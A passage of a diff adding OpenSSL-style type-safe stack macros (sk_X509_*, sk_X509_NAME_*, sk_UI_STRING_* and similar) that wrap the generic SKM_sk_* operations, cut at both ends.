+# define sk_STORE_ATTR_INFO_pop(st) SKM_sk_pop(STORE_ATTR_INFO, (st))
+# define sk_STORE_ATTR_INFO_sort(st) SKM_sk_sort(STORE_ATTR_INFO, (st))
+# define sk_STORE_ATTR_INFO_is_sorted(st) SKM_sk_is_sorted(STORE_ATTR_INFO, (st))
+# define sk_STORE_OBJECT_new(cmp) SKM_sk_new(STORE_OBJECT, (cmp))
+# define sk_STORE_OBJECT_new_null() SKM_sk_new_null(STORE_OBJECT)
+# define sk_STORE_OBJECT_free(st) SKM_sk_free(STORE_OBJECT, (st))
+# define sk_STORE_OBJECT_num(st) SKM_sk_num(STORE_OBJECT, (st))
+# define sk_STORE_OBJECT_value(st, i) SKM_sk_value(STORE_OBJECT, (st), (i))
+# define sk_STORE_OBJECT_set(st, i, val) SKM_sk_set(STORE_OBJECT, (st), (i), (val))
+# define sk_STORE_OBJECT_zero(st) SKM_sk_zero(STORE_OBJECT, (st))
+# define sk_STORE_OBJECT_push(st, val) SKM_sk_push(STORE_OBJECT, (st), (val))
+# define sk_STORE_OBJECT_unshift(st, val) SKM_sk_unshift(STORE_OBJECT, (st), (val))
+# define sk_STORE_OBJECT_find(st, val) SKM_sk_find(STORE_OBJECT, (st), (val))
+# define sk_STORE_OBJECT_find_ex(st, val) SKM_sk_find_ex(STORE_OBJECT, (st), (val))
+# define sk_STORE_OBJECT_delete(st, i) SKM_sk_delete(STORE_OBJECT, (st), (i))
+# define sk_STORE_OBJECT_delete_ptr(st, ptr) SKM_sk_delete_ptr(STORE_OBJECT, (st), (ptr))
+# define sk_STORE_OBJECT_insert(st, val, i) SKM_sk_insert(STORE_OBJECT, (st), (val), (i))
+# define sk_STORE_OBJECT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(STORE_OBJECT, (st), (cmp))
+# define sk_STORE_OBJECT_dup(st) SKM_sk_dup(STORE_OBJECT, st)
+# define sk_STORE_OBJECT_pop_free(st, free_func) SKM_sk_pop_free(STORE_OBJECT, (st), (free_func))
+# define sk_STORE_OBJECT_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(STORE_OBJECT, (st), (copy_func), (free_func))
+# define sk_STORE_OBJECT_shift(st) SKM_sk_shift(STORE_OBJECT, (st))
+# define sk_STORE_OBJECT_pop(st) SKM_sk_pop(STORE_OBJECT, (st))
+# define sk_STORE_OBJECT_sort(st) SKM_sk_sort(STORE_OBJECT, (st))
+# define sk_STORE_OBJECT_is_sorted(st) SKM_sk_is_sorted(STORE_OBJECT, (st))
+# define sk_SXNETID_new(cmp) SKM_sk_new(SXNETID, (cmp))
+# define sk_SXNETID_new_null() SKM_sk_new_null(SXNETID)
+# define sk_SXNETID_free(st) SKM_sk_free(SXNETID, (st))
+# define sk_SXNETID_num(st) SKM_sk_num(SXNETID, (st))
+# define sk_SXNETID_value(st, i) SKM_sk_value(SXNETID, (st), (i))
+# define sk_SXNETID_set(st, i, val) SKM_sk_set(SXNETID, (st), (i), (val))
+# define sk_SXNETID_zero(st) SKM_sk_zero(SXNETID, (st))
+# define sk_SXNETID_push(st, val) SKM_sk_push(SXNETID, (st), (val))
+# define sk_SXNETID_unshift(st, val) SKM_sk_unshift(SXNETID, (st), (val))
+# define sk_SXNETID_find(st, val) SKM_sk_find(SXNETID, (st), (val))
+# define sk_SXNETID_find_ex(st, val) SKM_sk_find_ex(SXNETID, (st), (val))
+# define sk_SXNETID_delete(st, i) SKM_sk_delete(SXNETID, (st), (i))
+# define sk_SXNETID_delete_ptr(st, ptr) SKM_sk_delete_ptr(SXNETID, (st), (ptr))
+# define sk_SXNETID_insert(st, val, i) SKM_sk_insert(SXNETID, (st), (val), (i))
+# define sk_SXNETID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SXNETID, (st), (cmp))
+# define sk_SXNETID_dup(st) SKM_sk_dup(SXNETID, st)
+# define sk_SXNETID_pop_free(st, free_func) SKM_sk_pop_free(SXNETID, (st), (free_func))
+# define sk_SXNETID_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(SXNETID, (st), (copy_func), (free_func))
+# define sk_SXNETID_shift(st) SKM_sk_shift(SXNETID, (st))
+# define sk_SXNETID_pop(st) SKM_sk_pop(SXNETID, (st))
+# define sk_SXNETID_sort(st) SKM_sk_sort(SXNETID, (st))
+# define sk_SXNETID_is_sorted(st) SKM_sk_is_sorted(SXNETID, (st))
+# define sk_UI_STRING_new(cmp) SKM_sk_new(UI_STRING, (cmp))
+# define sk_UI_STRING_new_null() SKM_sk_new_null(UI_STRING)
+# define sk_UI_STRING_free(st) SKM_sk_free(UI_STRING, (st))
+# define sk_UI_STRING_num(st) SKM_sk_num(UI_STRING, (st))
+# define sk_UI_STRING_value(st, i) SKM_sk_value(UI_STRING, (st), (i))
+# define sk_UI_STRING_set(st, i, val) SKM_sk_set(UI_STRING, (st), (i), (val))
+# define sk_UI_STRING_zero(st) SKM_sk_zero(UI_STRING, (st))
+# define sk_UI_STRING_push(st, val) SKM_sk_push(UI_STRING, (st), (val))
+# define sk_UI_STRING_unshift(st, val) SKM_sk_unshift(UI_STRING, (st), (val))
+# define sk_UI_STRING_find(st, val) SKM_sk_find(UI_STRING, (st), (val))
+# define sk_UI_STRING_find_ex(st, val) SKM_sk_find_ex(UI_STRING, (st), (val))
+# define sk_UI_STRING_delete(st, i) SKM_sk_delete(UI_STRING, (st), (i))
+# define sk_UI_STRING_delete_ptr(st, ptr) SKM_sk_delete_ptr(UI_STRING, (st), (ptr))
+# define sk_UI_STRING_insert(st, val, i) SKM_sk_insert(UI_STRING, (st), (val), (i))
+# define sk_UI_STRING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(UI_STRING, (st), (cmp))
+# define sk_UI_STRING_dup(st) SKM_sk_dup(UI_STRING, st)
+# define sk_UI_STRING_pop_free(st, free_func) SKM_sk_pop_free(UI_STRING, (st), (free_func))
+# define sk_UI_STRING_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(UI_STRING, (st), (copy_func), (free_func))
+# define sk_UI_STRING_shift(st) SKM_sk_shift(UI_STRING, (st))
+# define sk_UI_STRING_pop(st) SKM_sk_pop(UI_STRING, (st))
+# define sk_UI_STRING_sort(st) SKM_sk_sort(UI_STRING, (st))
+# define sk_UI_STRING_is_sorted(st) SKM_sk_is_sorted(UI_STRING, (st))
+# define sk_X509_new(cmp) SKM_sk_new(X509, (cmp))
+# define sk_X509_new_null() SKM_sk_new_null(X509)
+# define sk_X509_free(st) SKM_sk_free(X509, (st))
+# define sk_X509_num(st) SKM_sk_num(X509, (st))
+# define sk_X509_value(st, i) SKM_sk_value(X509, (st), (i))
+# define sk_X509_set(st, i, val) SKM_sk_set(X509, (st), (i), (val))
+# define sk_X509_zero(st) SKM_sk_zero(X509, (st))
+# define sk_X509_push(st, val) SKM_sk_push(X509, (st), (val))
+# define sk_X509_unshift(st, val) SKM_sk_unshift(X509, (st), (val))
+# define sk_X509_find(st, val) SKM_sk_find(X509, (st), (val))
+# define sk_X509_find_ex(st, val) SKM_sk_find_ex(X509, (st), (val))
+# define sk_X509_delete(st, i) SKM_sk_delete(X509, (st), (i))
+# define sk_X509_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509, (st), (ptr))
+# define sk_X509_insert(st, val, i) SKM_sk_insert(X509, (st), (val), (i))
+# define sk_X509_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509, (st), (cmp))
+# define sk_X509_dup(st) SKM_sk_dup(X509, st)
+# define sk_X509_pop_free(st, free_func) SKM_sk_pop_free(X509, (st), (free_func))
+# define sk_X509_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509, (st), (copy_func), (free_func))
+# define sk_X509_shift(st) SKM_sk_shift(X509, (st))
+# define sk_X509_pop(st) SKM_sk_pop(X509, (st))
+# define sk_X509_sort(st) SKM_sk_sort(X509, (st))
+# define sk_X509_is_sorted(st) SKM_sk_is_sorted(X509, (st))
+# define sk_X509V3_EXT_METHOD_new(cmp) SKM_sk_new(X509V3_EXT_METHOD, (cmp))
+# define sk_X509V3_EXT_METHOD_new_null() SKM_sk_new_null(X509V3_EXT_METHOD)
+# define sk_X509V3_EXT_METHOD_free(st) SKM_sk_free(X509V3_EXT_METHOD, (st))
+# define sk_X509V3_EXT_METHOD_num(st) SKM_sk_num(X509V3_EXT_METHOD, (st))
+# define sk_X509V3_EXT_METHOD_value(st, i) SKM_sk_value(X509V3_EXT_METHOD, (st), (i))
+# define sk_X509V3_EXT_METHOD_set(st, i, val) SKM_sk_set(X509V3_EXT_METHOD, (st), (i), (val))
+# define sk_X509V3_EXT_METHOD_zero(st) SKM_sk_zero(X509V3_EXT_METHOD, (st))
+# define sk_X509V3_EXT_METHOD_push(st, val) SKM_sk_push(X509V3_EXT_METHOD, (st), (val))
+# define sk_X509V3_EXT_METHOD_unshift(st, val) SKM_sk_unshift(X509V3_EXT_METHOD, (st), (val))
+# define sk_X509V3_EXT_METHOD_find(st, val) SKM_sk_find(X509V3_EXT_METHOD, (st), (val))
+# define sk_X509V3_EXT_METHOD_find_ex(st, val) SKM_sk_find_ex(X509V3_EXT_METHOD, (st), (val))
+# define sk_X509V3_EXT_METHOD_delete(st, i) SKM_sk_delete(X509V3_EXT_METHOD, (st), (i))
+# define sk_X509V3_EXT_METHOD_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509V3_EXT_METHOD, (st), (ptr))
+# define sk_X509V3_EXT_METHOD_insert(st, val, i) SKM_sk_insert(X509V3_EXT_METHOD, (st), (val), (i))
+# define sk_X509V3_EXT_METHOD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509V3_EXT_METHOD, (st), (cmp))
+# define sk_X509V3_EXT_METHOD_dup(st) SKM_sk_dup(X509V3_EXT_METHOD, st)
+# define sk_X509V3_EXT_METHOD_pop_free(st, free_func) SKM_sk_pop_free(X509V3_EXT_METHOD, (st), (free_func))
+# define sk_X509V3_EXT_METHOD_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509V3_EXT_METHOD, (st), (copy_func), (free_func))
+# define sk_X509V3_EXT_METHOD_shift(st) SKM_sk_shift(X509V3_EXT_METHOD, (st))
+# define sk_X509V3_EXT_METHOD_pop(st) SKM_sk_pop(X509V3_EXT_METHOD, (st))
+# define sk_X509V3_EXT_METHOD_sort(st) SKM_sk_sort(X509V3_EXT_METHOD, (st))
+# define sk_X509V3_EXT_METHOD_is_sorted(st) SKM_sk_is_sorted(X509V3_EXT_METHOD, (st))
+# define sk_X509_ALGOR_new(cmp) SKM_sk_new(X509_ALGOR, (cmp))
+# define sk_X509_ALGOR_new_null() SKM_sk_new_null(X509_ALGOR)
+# define sk_X509_ALGOR_free(st) SKM_sk_free(X509_ALGOR, (st))
+# define sk_X509_ALGOR_num(st) SKM_sk_num(X509_ALGOR, (st))
+# define sk_X509_ALGOR_value(st, i) SKM_sk_value(X509_ALGOR, (st), (i))
+# define sk_X509_ALGOR_set(st, i, val) SKM_sk_set(X509_ALGOR, (st), (i), (val))
+# define sk_X509_ALGOR_zero(st) SKM_sk_zero(X509_ALGOR, (st))
+# define sk_X509_ALGOR_push(st, val) SKM_sk_push(X509_ALGOR, (st), (val))
+# define sk_X509_ALGOR_unshift(st, val) SKM_sk_unshift(X509_ALGOR, (st), (val))
+# define sk_X509_ALGOR_find(st, val) SKM_sk_find(X509_ALGOR, (st), (val))
+# define sk_X509_ALGOR_find_ex(st, val) SKM_sk_find_ex(X509_ALGOR, (st), (val))
+# define sk_X509_ALGOR_delete(st, i) SKM_sk_delete(X509_ALGOR, (st), (i))
+# define sk_X509_ALGOR_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_ALGOR, (st), (ptr))
+# define sk_X509_ALGOR_insert(st, val, i) SKM_sk_insert(X509_ALGOR, (st), (val), (i))
+# define sk_X509_ALGOR_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_ALGOR, (st), (cmp))
+# define sk_X509_ALGOR_dup(st) SKM_sk_dup(X509_ALGOR, st)
+# define sk_X509_ALGOR_pop_free(st, free_func) SKM_sk_pop_free(X509_ALGOR, (st), (free_func))
+# define sk_X509_ALGOR_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_ALGOR, (st), (copy_func), (free_func))
+# define sk_X509_ALGOR_shift(st) SKM_sk_shift(X509_ALGOR, (st))
+# define sk_X509_ALGOR_pop(st) SKM_sk_pop(X509_ALGOR, (st))
+# define sk_X509_ALGOR_sort(st) SKM_sk_sort(X509_ALGOR, (st))
+# define sk_X509_ALGOR_is_sorted(st) SKM_sk_is_sorted(X509_ALGOR, (st))
+# define sk_X509_ATTRIBUTE_new(cmp) SKM_sk_new(X509_ATTRIBUTE, (cmp))
+# define sk_X509_ATTRIBUTE_new_null() SKM_sk_new_null(X509_ATTRIBUTE)
+# define sk_X509_ATTRIBUTE_free(st) SKM_sk_free(X509_ATTRIBUTE, (st))
+# define sk_X509_ATTRIBUTE_num(st) SKM_sk_num(X509_ATTRIBUTE, (st))
+# define sk_X509_ATTRIBUTE_value(st, i) SKM_sk_value(X509_ATTRIBUTE, (st), (i))
+# define sk_X509_ATTRIBUTE_set(st, i, val) SKM_sk_set(X509_ATTRIBUTE, (st), (i), (val))
+# define sk_X509_ATTRIBUTE_zero(st) SKM_sk_zero(X509_ATTRIBUTE, (st))
+# define sk_X509_ATTRIBUTE_push(st, val) SKM_sk_push(X509_ATTRIBUTE, (st), (val))
+# define sk_X509_ATTRIBUTE_unshift(st, val) SKM_sk_unshift(X509_ATTRIBUTE, (st), (val))
+# define sk_X509_ATTRIBUTE_find(st, val) SKM_sk_find(X509_ATTRIBUTE, (st), (val))
+# define sk_X509_ATTRIBUTE_find_ex(st, val) SKM_sk_find_ex(X509_ATTRIBUTE, (st), (val))
+# define sk_X509_ATTRIBUTE_delete(st, i) SKM_sk_delete(X509_ATTRIBUTE, (st), (i))
+# define sk_X509_ATTRIBUTE_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_ATTRIBUTE, (st), (ptr))
+# define sk_X509_ATTRIBUTE_insert(st, val, i) SKM_sk_insert(X509_ATTRIBUTE, (st), (val), (i))
+# define sk_X509_ATTRIBUTE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_ATTRIBUTE, (st), (cmp))
+# define sk_X509_ATTRIBUTE_dup(st) SKM_sk_dup(X509_ATTRIBUTE, st)
+# define sk_X509_ATTRIBUTE_pop_free(st, free_func) SKM_sk_pop_free(X509_ATTRIBUTE, (st), (free_func))
+# define sk_X509_ATTRIBUTE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_ATTRIBUTE, (st), (copy_func), (free_func))
+# define sk_X509_ATTRIBUTE_shift(st) SKM_sk_shift(X509_ATTRIBUTE, (st))
+# define sk_X509_ATTRIBUTE_pop(st) SKM_sk_pop(X509_ATTRIBUTE, (st))
+# define sk_X509_ATTRIBUTE_sort(st) SKM_sk_sort(X509_ATTRIBUTE, (st))
+# define sk_X509_ATTRIBUTE_is_sorted(st) SKM_sk_is_sorted(X509_ATTRIBUTE, (st))
+# define sk_X509_CRL_new(cmp) SKM_sk_new(X509_CRL, (cmp))
+# define sk_X509_CRL_new_null() SKM_sk_new_null(X509_CRL)
+# define sk_X509_CRL_free(st) SKM_sk_free(X509_CRL, (st))
+# define sk_X509_CRL_num(st) SKM_sk_num(X509_CRL, (st))
+# define sk_X509_CRL_value(st, i) SKM_sk_value(X509_CRL, (st), (i))
+# define sk_X509_CRL_set(st, i, val) SKM_sk_set(X509_CRL, (st), (i), (val))
+# define sk_X509_CRL_zero(st) SKM_sk_zero(X509_CRL, (st))
+# define sk_X509_CRL_push(st, val) SKM_sk_push(X509_CRL, (st), (val))
+# define sk_X509_CRL_unshift(st, val) SKM_sk_unshift(X509_CRL, (st), (val))
+# define sk_X509_CRL_find(st, val) SKM_sk_find(X509_CRL, (st), (val))
+# define sk_X509_CRL_find_ex(st, val) SKM_sk_find_ex(X509_CRL, (st), (val))
+# define sk_X509_CRL_delete(st, i) SKM_sk_delete(X509_CRL, (st), (i))
+# define sk_X509_CRL_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_CRL, (st), (ptr))
+# define sk_X509_CRL_insert(st, val, i) SKM_sk_insert(X509_CRL, (st), (val), (i))
+# define sk_X509_CRL_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_CRL, (st), (cmp))
+# define sk_X509_CRL_dup(st) SKM_sk_dup(X509_CRL, st)
+# define sk_X509_CRL_pop_free(st, free_func) SKM_sk_pop_free(X509_CRL, (st), (free_func))
+# define sk_X509_CRL_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_CRL, (st), (copy_func), (free_func))
+# define sk_X509_CRL_shift(st) SKM_sk_shift(X509_CRL, (st))
+# define sk_X509_CRL_pop(st) SKM_sk_pop(X509_CRL, (st))
+# define sk_X509_CRL_sort(st) SKM_sk_sort(X509_CRL, (st))
+# define sk_X509_CRL_is_sorted(st) SKM_sk_is_sorted(X509_CRL, (st))
+# define sk_X509_EXTENSION_new(cmp) SKM_sk_new(X509_EXTENSION, (cmp))
+# define sk_X509_EXTENSION_new_null() SKM_sk_new_null(X509_EXTENSION)
+# define sk_X509_EXTENSION_free(st) SKM_sk_free(X509_EXTENSION, (st))
+# define sk_X509_EXTENSION_num(st) SKM_sk_num(X509_EXTENSION, (st))
+# define sk_X509_EXTENSION_value(st, i) SKM_sk_value(X509_EXTENSION, (st), (i))
+# define sk_X509_EXTENSION_set(st, i, val) SKM_sk_set(X509_EXTENSION, (st), (i), (val))
+# define sk_X509_EXTENSION_zero(st) SKM_sk_zero(X509_EXTENSION, (st))
+# define sk_X509_EXTENSION_push(st, val) SKM_sk_push(X509_EXTENSION, (st), (val))
+# define sk_X509_EXTENSION_unshift(st, val) SKM_sk_unshift(X509_EXTENSION, (st), (val))
+# define sk_X509_EXTENSION_find(st, val) SKM_sk_find(X509_EXTENSION, (st), (val))
+# define sk_X509_EXTENSION_find_ex(st, val) SKM_sk_find_ex(X509_EXTENSION, (st), (val))
+# define sk_X509_EXTENSION_delete(st, i) SKM_sk_delete(X509_EXTENSION, (st), (i))
+# define sk_X509_EXTENSION_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_EXTENSION, (st), (ptr))
+# define sk_X509_EXTENSION_insert(st, val, i) SKM_sk_insert(X509_EXTENSION, (st), (val), (i))
+# define sk_X509_EXTENSION_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_EXTENSION, (st), (cmp))
+# define sk_X509_EXTENSION_dup(st) SKM_sk_dup(X509_EXTENSION, st)
+# define sk_X509_EXTENSION_pop_free(st, free_func) SKM_sk_pop_free(X509_EXTENSION, (st), (free_func))
+# define sk_X509_EXTENSION_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_EXTENSION, (st), (copy_func), (free_func))
+# define sk_X509_EXTENSION_shift(st) SKM_sk_shift(X509_EXTENSION, (st))
+# define sk_X509_EXTENSION_pop(st) SKM_sk_pop(X509_EXTENSION, (st))
+# define sk_X509_EXTENSION_sort(st) SKM_sk_sort(X509_EXTENSION, (st))
+# define sk_X509_EXTENSION_is_sorted(st) SKM_sk_is_sorted(X509_EXTENSION, (st))
+# define sk_X509_INFO_new(cmp) SKM_sk_new(X509_INFO, (cmp))
+# define sk_X509_INFO_new_null() SKM_sk_new_null(X509_INFO)
+# define sk_X509_INFO_free(st) SKM_sk_free(X509_INFO, (st))
+# define sk_X509_INFO_num(st) SKM_sk_num(X509_INFO, (st))
+# define sk_X509_INFO_value(st, i) SKM_sk_value(X509_INFO, (st), (i))
+# define sk_X509_INFO_set(st, i, val) SKM_sk_set(X509_INFO, (st), (i), (val))
+# define sk_X509_INFO_zero(st) SKM_sk_zero(X509_INFO, (st))
+# define sk_X509_INFO_push(st, val) SKM_sk_push(X509_INFO, (st), (val))
+# define sk_X509_INFO_unshift(st, val) SKM_sk_unshift(X509_INFO, (st), (val))
+# define sk_X509_INFO_find(st, val) SKM_sk_find(X509_INFO, (st), (val))
+# define sk_X509_INFO_find_ex(st, val) SKM_sk_find_ex(X509_INFO, (st), (val))
+# define sk_X509_INFO_delete(st, i) SKM_sk_delete(X509_INFO, (st), (i))
+# define sk_X509_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_INFO, (st), (ptr))
+# define sk_X509_INFO_insert(st, val, i) SKM_sk_insert(X509_INFO, (st), (val), (i))
+# define sk_X509_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_INFO, (st), (cmp))
+# define sk_X509_INFO_dup(st) SKM_sk_dup(X509_INFO, st)
+# define sk_X509_INFO_pop_free(st, free_func) SKM_sk_pop_free(X509_INFO, (st), (free_func))
+# define sk_X509_INFO_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_INFO, (st), (copy_func), (free_func))
+# define sk_X509_INFO_shift(st) SKM_sk_shift(X509_INFO, (st))
+# define sk_X509_INFO_pop(st) SKM_sk_pop(X509_INFO, (st))
+# define sk_X509_INFO_sort(st) SKM_sk_sort(X509_INFO, (st))
+# define sk_X509_INFO_is_sorted(st) SKM_sk_is_sorted(X509_INFO, (st))
+# define sk_X509_LOOKUP_new(cmp) SKM_sk_new(X509_LOOKUP, (cmp))
+# define sk_X509_LOOKUP_new_null() SKM_sk_new_null(X509_LOOKUP)
+# define sk_X509_LOOKUP_free(st) SKM_sk_free(X509_LOOKUP, (st))
+# define sk_X509_LOOKUP_num(st) SKM_sk_num(X509_LOOKUP, (st))
+# define sk_X509_LOOKUP_value(st, i) SKM_sk_value(X509_LOOKUP, (st), (i))
+# define sk_X509_LOOKUP_set(st, i, val) SKM_sk_set(X509_LOOKUP, (st), (i), (val))
+# define sk_X509_LOOKUP_zero(st) SKM_sk_zero(X509_LOOKUP, (st))
+# define sk_X509_LOOKUP_push(st, val) SKM_sk_push(X509_LOOKUP, (st), (val))
+# define sk_X509_LOOKUP_unshift(st, val) SKM_sk_unshift(X509_LOOKUP, (st), (val))
+# define sk_X509_LOOKUP_find(st, val) SKM_sk_find(X509_LOOKUP, (st), (val))
+# define sk_X509_LOOKUP_find_ex(st, val) SKM_sk_find_ex(X509_LOOKUP, (st), (val))
+# define sk_X509_LOOKUP_delete(st, i) SKM_sk_delete(X509_LOOKUP, (st), (i))
+# define sk_X509_LOOKUP_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_LOOKUP, (st), (ptr))
+# define sk_X509_LOOKUP_insert(st, val, i) SKM_sk_insert(X509_LOOKUP, (st), (val), (i))
+# define sk_X509_LOOKUP_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_LOOKUP, (st), (cmp))
+# define sk_X509_LOOKUP_dup(st) SKM_sk_dup(X509_LOOKUP, st)
+# define sk_X509_LOOKUP_pop_free(st, free_func) SKM_sk_pop_free(X509_LOOKUP, (st), (free_func))
+# define sk_X509_LOOKUP_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_LOOKUP, (st), (copy_func), (free_func))
+# define sk_X509_LOOKUP_shift(st) SKM_sk_shift(X509_LOOKUP, (st))
+# define sk_X509_LOOKUP_pop(st) SKM_sk_pop(X509_LOOKUP, (st))
+# define sk_X509_LOOKUP_sort(st) SKM_sk_sort(X509_LOOKUP, (st))
+# define sk_X509_LOOKUP_is_sorted(st) SKM_sk_is_sorted(X509_LOOKUP, (st))
+# define sk_X509_NAME_new(cmp) SKM_sk_new(X509_NAME, (cmp))
+# define sk_X509_NAME_new_null() SKM_sk_new_null(X509_NAME)
+# define sk_X509_NAME_free(st) SKM_sk_free(X509_NAME, (st))
+# define sk_X509_NAME_num(st) SKM_sk_num(X509_NAME, (st))
+# define sk_X509_NAME_value(st, i) SKM_sk_value(X509_NAME, (st), (i))
+# define sk_X509_NAME_set(st, i, val) SKM_sk_set(X509_NAME, (st), (i), (val))
+# define sk_X509_NAME_zero(st) SKM_sk_zero(X509_NAME, (st))
+# define sk_X509_NAME_push(st, val) SKM_sk_push(X509_NAME, (st), (val))
+# define sk_X509_NAME_unshift(st, val) SKM_sk_unshift(X509_NAME, (st), (val))
+# define sk_X509_NAME_find(st, val) SKM_sk_find(X509_NAME, (st), (val))
+# define sk_X509_NAME_find_ex(st, val) SKM_sk_find_ex(X509_NAME, (st), (val))
+# define sk_X509_NAME_delete(st, i) SKM_sk_delete(X509_NAME, (st), (i))
+# define sk_X509_NAME_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_NAME, (st), (ptr))
+# define sk_X509_NAME_insert(st, val, i) SKM_sk_insert(X509_NAME, (st), (val), (i))
+# define sk_X509_NAME_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_NAME, (st), (cmp))
+# define sk_X509_NAME_dup(st) SKM_sk_dup(X509_NAME, st)
+# define sk_X509_NAME_pop_free(st, free_func) SKM_sk_pop_free(X509_NAME, (st), (free_func))
+# define sk_X509_NAME_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_NAME, (st), (copy_func), (free_func))
+# define sk_X509_NAME_shift(st) SKM_sk_shift(X509_NAME, (st))
+# define sk_X509_NAME_pop(st) SKM_sk_pop(X509_NAME, (st))
+# define sk_X509_NAME_sort(st) SKM_sk_sort(X509_NAME, (st))
+# define sk_X509_NAME_is_sorted(st) SKM_sk_is_sorted(X509_NAME, (st))
+# define sk_X509_NAME_ENTRY_new(cmp) SKM_sk_new(X509_NAME_ENTRY, (cmp))
+# define sk_X509_NAME_ENTRY_new_null() SKM_sk_new_null(X509_NAME_ENTRY)
+# define sk_X509_NAME_ENTRY_free(st) SKM_sk_free(X509_NAME_ENTRY, (st))
+# define sk_X509_NAME_ENTRY_num(st) SKM_sk_num(X509_NAME_ENTRY, (st))
+# define sk_X509_NAME_ENTRY_value(st, i) SKM_sk_value(X509_NAME_ENTRY, (st), (i))
+# define sk_X509_NAME_ENTRY_set(st, i, val) SKM_sk_set(X509_NAME_ENTRY, (st), (i), (val))
+# define sk_X509_NAME_ENTRY_zero(st) SKM_sk_zero(X509_NAME_ENTRY, (st))
+# define sk_X509_NAME_ENTRY_push(st, val) SKM_sk_push(X509_NAME_ENTRY, (st), (val))
+# define sk_X509_NAME_ENTRY_unshift(st, val) SKM_sk_unshift(X509_NAME_ENTRY, (st), (val))
+# define sk_X509_NAME_ENTRY_find(st, val) SKM_sk_find(X509_NAME_ENTRY, (st), (val))
+# define sk_X509_NAME_ENTRY_find_ex(st, val) SKM_sk_find_ex(X509_NAME_ENTRY, (st), (val))
+# define sk_X509_NAME_ENTRY_delete(st, i) SKM_sk_delete(X509_NAME_ENTRY, (st), (i))
+# define sk_X509_NAME_ENTRY_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_NAME_ENTRY, (st), (ptr))
+# define sk_X509_NAME_ENTRY_insert(st, val, i) SKM_sk_insert(X509_NAME_ENTRY, (st), (val), (i))
+# define sk_X509_NAME_ENTRY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_NAME_ENTRY, (st), (cmp))
+# define sk_X509_NAME_ENTRY_dup(st) SKM_sk_dup(X509_NAME_ENTRY, st)
+# define sk_X509_NAME_ENTRY_pop_free(st, free_func) SKM_sk_pop_free(X509_NAME_ENTRY, (st), (free_func))
+# define sk_X509_NAME_ENTRY_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_NAME_ENTRY, (st), (copy_func), (free_func))
+# define sk_X509_NAME_ENTRY_shift(st) SKM_sk_shift(X509_NAME_ENTRY, (st))
+# define sk_X509_NAME_ENTRY_pop(st) SKM_sk_pop(X509_NAME_ENTRY, (st))
+# define sk_X509_NAME_ENTRY_sort(st) SKM_sk_sort(X509_NAME_ENTRY, (st))
+# define sk_X509_NAME_ENTRY_is_sorted(st) SKM_sk_is_sorted(X509_NAME_ENTRY, (st))
+# define sk_X509_OBJECT_new(cmp) SKM_sk_new(X509_OBJECT, (cmp))
+# define sk_X509_OBJECT_new_null() SKM_sk_new_null(X509_OBJECT)
+# define sk_X509_OBJECT_free(st) SKM_sk_free(X509_OBJECT, (st))
+# define sk_X509_OBJECT_num(st) SKM_sk_num(X509_OBJECT, (st))
+# define sk_X509_OBJECT_value(st, i) SKM_sk_value(X509_OBJECT, (st), (i))
+# define sk_X509_OBJECT_set(st, i, val) SKM_sk_set(X509_OBJECT, (st), (i), (val))
+# define sk_X509_OBJECT_zero(st) SKM_sk_zero(X509_OBJECT, (st))
+# define sk_X509_OBJECT_push(st, val) SKM_sk_push(X509_OBJECT, (st), (val))
+# define sk_X509_OBJECT_unshift(st, val) SKM_sk_unshift(X509_OBJECT, (st), (val))
+# define sk_X509_OBJECT_find(st, val) SKM_sk_find(X509_OBJECT, (st), (val))
+# define sk_X509_OBJECT_find_ex(st, val) SKM_sk_find_ex(X509_OBJECT, (st), (val))
+# define sk_X509_OBJECT_delete(st, i) SKM_sk_delete(X509_OBJECT, (st), (i))
+# define sk_X509_OBJECT_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_OBJECT, (st), (ptr))
+# define sk_X509_OBJECT_insert(st, val, i) SKM_sk_insert(X509_OBJECT, (st), (val), (i))
+# define sk_X509_OBJECT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_OBJECT, (st), (cmp))
+# define sk_X509_OBJECT_dup(st) SKM_sk_dup(X509_OBJECT, st)
+# define sk_X509_OBJECT_pop_free(st, free_func) SKM_sk_pop_free(X509_OBJECT, (st), (free_func))
+# define sk_X509_OBJECT_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_OBJECT, (st), (copy_func), (free_func))
+# define sk_X509_OBJECT_shift(st) SKM_sk_shift(X509_OBJECT, (st))
+# define sk_X509_OBJECT_pop(st) SKM_sk_pop(X509_OBJECT, (st))
